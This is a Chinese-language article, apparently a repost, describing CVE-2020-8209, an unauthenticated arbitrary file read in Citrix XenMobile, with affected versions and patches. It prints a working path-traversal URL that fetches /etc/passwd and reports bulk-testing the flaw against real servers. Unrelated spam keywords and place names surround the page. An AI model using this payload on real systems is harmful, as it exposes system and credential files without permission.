中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Citrix Endpoint Management任意文件讀取漏洞CVE-2020-8209示例分析

發布時間:2021-12-28 20:20:22 來源:億速云 閱讀:133 作者:柒染 欄目:安全技術

今天就跟大家聊聊有關Citrix Endpoint Management任意文件讀取漏洞CVE-2020-8209示例分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

Citrix Endpoint Management任意文件讀取漏洞CVE-2020-8209示例分析

CVE-2020-8209(Citrix Endpoint Management 任意文件讀取)


一、漏洞描述:

XenMobile是Citrix開發的企業移動性管理軟件。該產品允許企業管理員工的移動設備和移動應用程序。該軟件的目的是通過允許員工安全地在企業擁有的和個人移動設備及應用程序上工作來提高生產率。

Citrix Endpoint Management 存在 任意文件讀取漏洞,遠程未授權攻擊者 通過 發送特制HTTP請求,可以造成 讀取受影響設備上任意文件 的影響。

二、影響版本

以下版本受到嚴重影響

XenMobile Server < 10.12 RP2

XenMobile Server < 10.11 RP4

XenMobile Server < 10.10 RP6

XenMobile Server < 10.9 RP5

以下版本受到中等影響

XenMobile Server < 10.12 RP3

XenMobile Server < 10.11 RP6

XenMobile Server < 10.10 RP6

XenMobile Server < 10.9 RP5

三、漏洞復現

POC很簡單:直接訪問url路徑就是



/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

Citrix Endpoint Management任意文件讀取漏洞CVE-2020-8209示例分析

直接訪問就下載文件了

Citrix Endpoint Management任意文件讀取漏洞CVE-2020-8209示例分析

Citrix Endpoint Management任意文件讀取漏洞CVE-2020-8209示例分析

嘗試批量跑了一下(基本上國外的較多使用):

Citrix Endpoint Management任意文件讀取漏洞CVE-2020-8209示例分析

四、修補建議:

根據版本安裝修補程序

XenMobile Server 10.12 RP3 XenMobile Server 10.11 RP6 XenMobile Server 10.10 RP6 XenMobile Server 10.9 RP5

看完上述內容,你們對Citrix Endpoint Management任意文件讀取漏洞CVE-2020-8209示例分析有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

花莲县| 沈阳市| 南充市| 藁城市| 临漳县| 黔南| 会泽县| 旬阳县| 渝中区| 蒙山县| 德惠市| 内江市| 拜泉县| 临桂县| 新营市| 涟水县| 醴陵市| 商南县| 清水县| 阿巴嘎旗| 大庆市| 那坡县| 嘉义县| 乌拉特中旗| 萨嘎县| 略阳县| 宝鸡市| 青川县| 许昌市| 滨州市| 山西省| 长春市| 大关县| 剑阁县| 四平市| 麻城市| 定兴县| 阳江市| 凤阳县| 瓮安县| 松溪县|